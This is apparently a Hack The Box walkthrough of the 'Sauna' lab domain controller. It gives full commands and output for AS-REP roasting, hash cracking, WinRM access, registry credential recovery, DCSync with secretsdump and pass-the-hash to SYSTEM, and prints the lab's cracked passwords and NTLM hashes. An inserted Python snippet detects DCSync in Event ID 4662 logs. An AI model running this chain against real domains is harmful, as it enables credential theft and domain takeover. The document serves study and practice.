Back when I did this box 2 years ago, I used commands like type to look at the content of files, or normal command-line commands within powershell, as well as Metasploit. As I am redoing some sections for documentation purposes, I will use a different approach, such as using powershell commands, and avoid relying on methods that might not be helpful when going through exams like the OSCP.
Let's face it, writing documentation from something you wrote and worked on two years ago can be a headache.
Sauna can be a good HTB box to practice your enumeration process, both remote and local, as you can find what you need to do by carefully assessing the services and the system itself. It never hurts anyone to be thorough when enumerating.
References:
Enumeration
Finding Open Ports
To gather information about this machine, we start by finding any TCP/UDP open ports using masscan.
┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ sudo masscan -e tun1 -p1-65535,U:1-65535 10.10.10.175 --rate=1000 | tee Sauna-masscan.log
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-02-15 19:57:41 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 53/udp on 10.10.10.175
Discovered open port 636/tcp on 10.10.10.175
Discovered open port 135/tcp on 10.10.10.175
Discovered open port 389/tcp on 10.10.10.175
Discovered open port 49667/tcp on 10.10.10.175
Discovered open port 139/tcp on 10.10.10.175
Discovered open port 445/tcp on 10.10.10.175
Discovered open port 88/tcp on 10.10.10.175
Discovered open port 49669/tcp on 10.10.10.175
Discovered open port 9389/tcp on 10.10.10.175
Discovered open port 464/tcp on 10.10.10.175
Discovered open port 3269/tcp on 10.10.10.175
Discovered open port 49671/tcp on 10.10.10.175
Discovered open port 52250/tcp on 10.10.10.175
Discovered open port 80/tcp on 10.10.10.175
Discovered open port 5985/tcp on 10.10.10.175
Discovered open port 3268/tcp on 10.10.10.175
Discovered open port 593/tcp on 10.10.10.175
Discovered open port 49682/tcp on 10.10.10.175
Discovered open port 53/tcp on 10.10.10.175
Discovered open port 49670/tcp on 10.10.10.175
Port Scanning
To get more information about the open ports we found, we ran an nmap SYN scan (-sS) with default script execution (-sC) and service version detection (-sV).
Before doing so, we collected the open TCP ports into a variable (PORTS) to pass to the scan. This step is not necessary, but it is convenient.
┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ PORTS=$(cat Sauna-masscan.log | grep tcp | cut -d ' ' -f 4 | cut -d '/' -f 1 | xargs | tr ' ' ',')
┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ sudo nmap -Pn -sS -sC -sV -p $PORTS --min-rate=1000 -T4 sauna.htb
[sudo] password for jxberrios:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-14 01:19 EDT
Nmap scan report for sauna.htb (10.10.10.175)
Host is up (0.040s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-14 12:18:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp filtered unknown
49670/tcp filtered unknown
49671/tcp filtered unknown
49682/tcp filtered unknown
52250/tcp filtered unknown
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-04-14T12:18:59
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: 6h58m39s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.50 seconds
From the services found, whenever LDAP(S) or SMB are accessible, I try to target these services first instead of going for others like HTTP. These services are frequently misconfigured and allow access with no authentication.
Enumerating LDAP
While enumerating LDAP, we try to limit the scope and reduce the amount of data returned while still getting the information we need. Here, we pulled the naming contexts as well as the DNs available.
Now that we found the 'CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL' distinguished name, we should try using it.
We don't have a definitive samAccountName to go by, but from all the possible username combinations we could come up with, hsmith seemed to give a different response when trying to check for Kerberos Pre-Authentication with GetNPUsers.
┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ impacket-GetNPUsers -no-pass -dc-ip sauna.htb EGOTISTICALBANK/hsmith
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for hsmith
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
Given this information, we should go to the web service available:
The /about.html page shows the company employees, which could be Active Directory users as well. At the same time, oddly enough, it shows two users, 'Hugo Bear' and 'Fergus Smith', but no 'Hugo Smith'.
Given this information, we should attempt to use hbear and fsmith.
Exploitation and Gaining Access
Using Impacket's GetNPUsers
Knowing that the valid samAccountName for Hugo Smith is hsmith, we tried hbear with no success, as that account does not seem to exist. Let's try fsmith and see whether we get a Kerberos TGT response (AS-REP) by performing an AS-REP Roasting attack.
And we got back a valid Kerberos ticket response. Let's try to crack it with John the Ripper.
Using John The Ripper
This step is self-explanatory. We rely on a password/hash cracking tool to recover fsmith's password by cracking the Kerberos AS-REP hash obtained in the previous AS-REP Roasting step.
┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt sauna_krb.txt > saunaCreds.txt
Using default input encoding: UTF-8
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1g 0:00:00:12 DONE (2020-02-16 13:03) 0.07923g/s 835103p/s 835103c/s 835103C/s Thrall..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed
jxberrios@back0ff:~/Documents/HTB-Labs/Sauna$ cat saunaCreds.txt
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Thestrokes23 ($krb5asrep$23$fsmith@EGOTISTICALBANK)
Using Enum4Linux
With these credentials, let's keep enumerating with enum4linux to gather user and group membership, operating system, and share information.
┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ enum4linux -U -G -S -r -o -u fsmith -p Thestrokes23 -w EGOTISTICALBANK sauna.htb
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Feb 16 13:05:49 2020
=========================================( Target Information )=========================================
Target ........... sauna.htb
RID Range ........ 500-550,1000-1050
Username ......... 'fsmith'
Password ......... 'Thestrokes23'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=============================( Enumerating Workgroup/Domain on sauna.htb )=============================
[+] Got domain/workgroup name: EGOTISTICALBANK
=====================================( Session Check on sauna.htb )=====================================
[+] Server sauna.htb allows sessions using username 'fsmith', password 'Thestrokes23'
==================================( Getting domain SID for sauna.htb )==================================
Domain Name: EGOTISTICALBANK
Domain Sid: S-1-5-21-2966785786-3096785034-1186376766
[+] Host is part of a domain (not a workgroup)
====================================( OS information on sauna.htb )====================================
[E] Can't get OS info with smbclient
[+] Got OS info for sauna.htb from srvinfo:
SAUNA.HTB Wk Sv PDC Tim PrQ NT SAUNA
platform_id : 500
os version : 10.0
server type : 0x80122b
=========================================( Users on sauna.htb )=========================================
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xfaf RID: 0x451 acb: 0x00010210 Account: FSmith Name: Fergus Smith Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xfad RID: 0x44f acb: 0x00000210 Account: HSmith Name: Hugo Smith Desc: (null)
index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0xfb6 RID: 0x454 acb: 0x00000210 Account: svc_loanmgr Name: L Manager Desc: (null)
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[HSmith] rid:[0x44f]
user:[FSmith] rid:[0x451]
user:[svc_loanmgr] rid:[0x454]
===================================( Share Enumeration on sauna.htb )===================================
do_connect: Connection to sauna.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
RICOH Aficio SP 8300DN PCL 6 Printer We cant print money
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on sauna.htb
//sauna.htb/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
//sauna.htb/C$ Mapping: DENIED Listing: N/A Writing: N/A
[E] Can't understand response:
NT_STATUS_INVALID_INFO_CLASS listing \*
//sauna.htb/IPC$ Mapping: N/A Listing: N/A Writing: N/A
//sauna.htb/NETLOGON Mapping: OK Listing: OK Writing: N/A
//sauna.htb/print$ Mapping: OK Listing: OK Writing: N/A
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//sauna.htb/RICOH Aficio SP 8300DN PCL 6 Mapping: N/A Listing: N/A Writing: N/A
//sauna.htb/SYSVOL Mapping: OK Listing: OK Writing: N/A
========================================( Groups on sauna.htb )========================================
[+] Getting builtin groups:
group:[Server Operators] rid:[0x225]
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[Storage Replica Administrators] rid:[0x246]
[+] Getting builtin group memberships:
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: NT AUTHORITY\Authenticated Users
Group: Remote Management Users' (RID: 580) has member: EGOTISTICALBANK\FSmith
Group: Remote Management Users' (RID: 580) has member: EGOTISTICALBANK\svc_loanmgr
Group: Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
Group: Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
Group: Users' (RID: 545) has member: EGOTISTICALBANK\Domain Users
Group: Administrators' (RID: 544) has member: EGOTISTICALBANK\Administrator
Group: Administrators' (RID: 544) has member: EGOTISTICALBANK\Enterprise Admins
Group: Administrators' (RID: 544) has member: EGOTISTICALBANK\Domain Admins
Group: Guests' (RID: 546) has member: EGOTISTICALBANK\Guest
Group: Guests' (RID: 546) has member: EGOTISTICALBANK\Domain Guests
Group: Windows Authorization Access Group' (RID: 560) has member: NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
[+] Getting local group memberships:
Group: Denied RODC Password Replication Group' (RID: 572) has member: EGOTISTICALBANK\krbtgt
Group: Denied RODC Password Replication Group' (RID: 572) has member: EGOTISTICALBANK\Domain Controllers
Group: Denied RODC Password Replication Group' (RID: 572) has member: EGOTISTICALBANK\Schema Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: EGOTISTICALBANK\Enterprise Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: EGOTISTICALBANK\Cert Publishers
Group: Denied RODC Password Replication Group' (RID: 572) has member: EGOTISTICALBANK\Domain Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: EGOTISTICALBANK\Group Policy Creator Owners
Group: Denied RODC Password Replication Group' (RID: 572) has member: EGOTISTICALBANK\Read-only Domain Controllers
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
[+] Getting domain group memberships:
Group: 'Schema Admins' (RID: 518) has member: EGOTISTICALBANK\Administrator
Group: 'Enterprise Admins' (RID: 519) has member: EGOTISTICALBANK\Administrator
Group: 'Domain Users' (RID: 513) has member: EGOTISTICALBANK\Administrator
Group: 'Domain Users' (RID: 513) has member: EGOTISTICALBANK\krbtgt
Group: 'Domain Users' (RID: 513) has member: EGOTISTICALBANK\HSmith
Group: 'Domain Users' (RID: 513) has member: EGOTISTICALBANK\FSmith
Group: 'Domain Users' (RID: 513) has member: EGOTISTICALBANK\svc_loanmgr
Group: 'Group Policy Creator Owners' (RID: 520) has member: EGOTISTICALBANK\Administrator
Group: 'Domain Guests' (RID: 514) has member: EGOTISTICALBANK\Guest
Group: 'Domain Admins' (RID: 512) has member: EGOTISTICALBANK\Administrator
Group: 'Domain Controllers' (RID: 516) has member: EGOTISTICALBANK\SAUNA$
====================( Users on sauna.htb via RID cycling (RIDS: 500-550,1000-1050) )====================
[I] Found new SID:
S-1-5-21-2966785786-3096785034-1186376766
[I] Found new SID:
S-1-5-21-2966785786-3096785034-1186376766
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-21-2957739120-1979133213-3197504660 and logon username 'fsmith', password 'Thestrokes23'
S-1-5-21-2957739120-1979133213-3197504660-500 SAUNA\Administrator (Local User)
S-1-5-21-2957739120-1979133213-3197504660-501 SAUNA\Guest (Local User)
S-1-5-21-2957739120-1979133213-3197504660-503 SAUNA\DefaultAccount (Local User)
S-1-5-21-2957739120-1979133213-3197504660-504 SAUNA\WDAGUtilityAccount (Local User)
S-1-5-21-2957739120-1979133213-3197504660-513 SAUNA\None (Domain Group)
[+] Enumerating users using SID S-1-5-90 and logon username 'fsmith', password 'Thestrokes23'
[+] Enumerating users using SID S-1-5-80 and logon username 'fsmith', password 'Thestrokes23'
[+] Enumerating users using SID S-1-5-21-2966785786-3096785034-1186376766 and logon username 'fsmith', password 'Thestrokes23'
S-1-5-21-2966785786-3096785034-1186376766-500 EGOTISTICALBANK\Administrator (Local User)
S-1-5-21-2966785786-3096785034-1186376766-501 EGOTISTICALBANK\Guest (Local User)
S-1-5-21-2966785786-3096785034-1186376766-502 EGOTISTICALBANK\krbtgt (Local User)
S-1-5-21-2966785786-3096785034-1186376766-512 EGOTISTICALBANK\Domain Admins (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-513 EGOTISTICALBANK\Domain Users (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-514 EGOTISTICALBANK\Domain Guests (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-515 EGOTISTICALBANK\Domain Computers (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-516 EGOTISTICALBANK\Domain Controllers (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-517 EGOTISTICALBANK\Cert Publishers (Local Group)
S-1-5-21-2966785786-3096785034-1186376766-518 EGOTISTICALBANK\Schema Admins (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-519 EGOTISTICALBANK\Enterprise Admins (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-520 EGOTISTICALBANK\Group Policy Creator Owners (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-521 EGOTISTICALBANK\Read-only Domain Controllers (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-522 EGOTISTICALBANK\Cloneable Domain Controllers (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-525 EGOTISTICALBANK\Protected Users (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-526 EGOTISTICALBANK\Key Admins (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-527 EGOTISTICALBANK\Enterprise Key Admins (Domain Group)
S-1-5-21-2966785786-3096785034-1186376766-1000 EGOTISTICALBANK\SAUNA$ (Local User)
[+] Enumerating users using SID S-1-5-80-3139157870-2983391045-3678747466-658725712 and logon username 'fsmith', password 'Thestrokes23'
[+] Enumerating users using SID S-1-5-82-3006700770-424185619-1745488364-794895919 and logon username 'fsmith', password 'Thestrokes23'
[+] Enumerating users using SID S-1-5-32 and logon username 'fsmith', password 'Thestrokes23'
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
enum4linux complete on Feb 16 13:16:49 2020
At this point, we have a list of users (local and domain), groups, shares, and other useful information. If we pay close attention, we also notice that fsmith cannot be used to access the system over SMB.
We also noticed that both fsmith and svc_loanmgr are members of the Remote Management Users group, which means both have access to WinRM.
Sample output:
Group: Remote Management Users' (RID: 580) has member: EGOTISTICALBANK\FSmith
Group: Remote Management Users' (RID: 580) has member: EGOTISTICALBANK\svc_loanmgr
Given that gaining access through SMB is out of the question, we should attempt access through WinRM.
Now that we are in the system, let's look at any paths to escalate privileges. Given that we have some domain accounts as well as local, we will need to do some more local enumeration.
Let's first use SharpHound and retrieve the data for further review:
*Evil-WinRM* PS C:\Users\FSmith\Downloads> upload /opt/BloodHound/Ingestors/SharpHound.exe
Info: Uploading /opt/BloodHound/Ingestors/SharpHound.exe to C:\Users\FSmith\Downloads\SharpHound.exe
Data: 1111380 bytes of 1111380 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\FSmith\Downloads> .\SharpHound.exe --domain EGOTISTICALBANK --ldapusername fsmith --ldappassword Thestrokes23 --collectionmethod All --collectallproperties --zipfilename ADExtract.zip
-----------------------------------------------
Initializing SharpHound at 3:22 AM on 4/14/2022
-----------------------------------------------
Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain EGOTISTICAL-BANK.LOCAL using path CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
[+] Cache File not Found: 0 Objects in cache
[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
Status: 60 objects finished (+60 ∞)/s -- Using 27 MB RAM
Enumeration finished in 00:00:00.3175357
Compressing data to .\20220414032226_ADExtract.zip
You can upload this file directly to the UI
SharpHound Enumeration Completed at 3:22 AM on 4/14/2022! Happy Graphing!
Continuing with some manual enumeration:
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> net user /domain
User accounts for \\
-------------------------------------------------------------------------------
Administrator FSmith Guest
HSmith krbtgt svc_loanmgr
The command completed with one or more errors.
Of these accounts we already know fsmith, so only hsmith and svc_loanmgr are left to look at.
*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user hsmith
User name HSmith
Full Name Hugo Smith
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/22/2020 10:54:34 PM
Password expires Never
Password changeable 1/23/2020 10:54:34 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user svc_loanmgr
User name svc_loanmgr
Full Name L Manager
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/24/2020 4:48:31 PM
Password expires Never
Password changeable 1/25/2020 4:48:31 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
Between these two accounts, we already knew from our remote enumeration that svc_loanmgr is a member of the Remote Management Users group; both, however, can authenticate against the domain.
Let's check whether any stored credentials exist by looking at the Winlogon registry key:
While looking at the cached logon count, we immediately notice credentials stored in the registry.
We can attempt to use them to authenticate through WinRM, but we need to use svc_loanmgr instead of the svc_loanmanager found in the DefaultUserName registry value, since that account does not exist. Then we check the account's privileges.
┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ evil-winrm -i sauna.htb -u svc_loanmgr -p 'Moneymakestheworldgoround!'
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
=========================== ==============================================
egotisticalbank\svc_loanmgr S-1-5-21-2966785786-3096785034-1186376766-1108
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
We don't see much here, but from what we found through BloodHound, svc_loanmgr has DCSync rights. Let's take a look at the BloodHound query and at what PowerSploit's PowerView reports.
Using BloodHound
Here, we use Bloodhound and the data retrieved previously from SharpHound.
The screenshot above shows the DCSync rights svc_loanmgr has, namely GetChanges and GetChangesAll. These are the same ACLs that members of the Administrators, Enterprise Domain Controllers and Domain Controllers groups have.
PowerView also shows we have DCSync access as svc_loanmgr. Let's move forward and retrieve the NTLM hashes.
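The replication rights shown above are also what a defender watches for: a domain controller logs Event ID 4662 for every exercise of the DS-Replication-Get-Changes control-access rights, and a request from anything other than a DC machine account is the DCSync signature. As an added example that is not from the original writeup, this Python runs that check over constructed 4662 records; the event dicts, the field subset and the allowlist are assumptions for illustration, while the three GUIDs are the real control-access rights.

```python
import re

# Control-access right GUIDs a DCSync (DRSUAPI replication) request exercises.
# With "Audit Directory Service Access" enabled, Event ID 4662 on the DC lists
# them in the Properties field.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(
    r"\{?([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\}?", re.I
)

# Constructed sample events, reduced to the 4662 fields the check needs. The
# domain and account names mirror the box; the event contents are made up to
# show one expected replication (the DC's own machine account), one that
# should alert, and two records that must be ignored.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectDomainName": "EGOTISTICALBANK", "SubjectUserName": "SAUNA$",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectDomainName": "EGOTISTICALBANK", "SubjectUserName": "svc_loanmgr",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A 4662 for an unrelated property (constructed GUID): must not alert.
    {"EventID": 4662, "SubjectDomainName": "EGOTISTICALBANK", "SubjectUserName": "FSmith",
     "AccessMask": "0x10",
     "Properties": "{deadbeef-0000-4000-8000-000000000001}"},
    # A different event id entirely: ignored.
    {"EventID": 4624, "SubjectDomainName": "EGOTISTICALBANK", "SubjectUserName": "svc_loanmgr",
     "AccessMask": "", "Properties": ""},
]


def replication_rights(event):
    """Return the names of replication rights referenced by a 4662 event."""
    if event.get("EventID") != 4662:
        return []
    return [REPLICATION_RIGHTS[g.lower()]
            for g in GUID_RE.findall(event.get("Properties", ""))
            if g.lower() in REPLICATION_RIGHTS]


def find_dcsync(events, allowlist=()):
    """Flag 4662 events where a non-DC principal exercised replication rights.

    Domain controllers replicate with their machine accounts (names ending in
    '$'); anything else asking for Get-Changes / Get-Changes-All is a DCSync.
    `allowlist` holds legitimate non-DC replicators (for example an Azure AD
    Connect service account) as DOMAIN\\name strings.
    """
    hits = []
    for ev in events:
        rights = replication_rights(ev)
        if not rights:
            continue
        principal = f"{ev['SubjectDomainName']}\\{ev['SubjectUserName']}"
        if ev["SubjectUserName"].endswith("$") or principal in allowlist:
            continue
        hits.append((principal, rights))
    return hits


if __name__ == "__main__":
    for principal, rights in find_dcsync(SAMPLE_EVENTS):
        print(f"ALERT possible DCSync by {principal}: {', '.join(rights)}")
```

A machine-account check alone is not enough in a real estate, since a compromised computer account can replicate too; correlating the subject with the list of DC computer objects tightens it.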
Using Impacket's Secretsdump
┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ impacket-secretsdump -just-dc-ntlm EGOTISTICALBANK/svc_loanmgr@sauna.htb
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:0067e5a87f8d378e81c6f674d49bb841:::
[*] Cleaning up...
Right there, we were able to extract the Administrator's NTLM hash from ntds.dit. Now we can use this hash to authenticate as the Administrator user through a Pass-the-Hash attack.
┌──(jxberrios 👿 back0ff)-[~/…/Sauna]
└─$ impacket-smbexec -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' EGOTISTICALBANK/Administrator@sauna.htb
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>cd c:\Users
[-] You can't CD under SMBEXEC. Use full paths.
C:\Windows\system32>dir "C:\Users\Administrator\Desktop"
Volume in drive C has no label.
Volume Serial Number is 489C-D8FC
Directory of C:\Users\Administrator\Desktop
07/14/2021 03:35 PM <DIR> .
07/14/2021 03:35 PM <DIR> ..
04/14/2022 02:08 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 7,821,971,456 bytes free
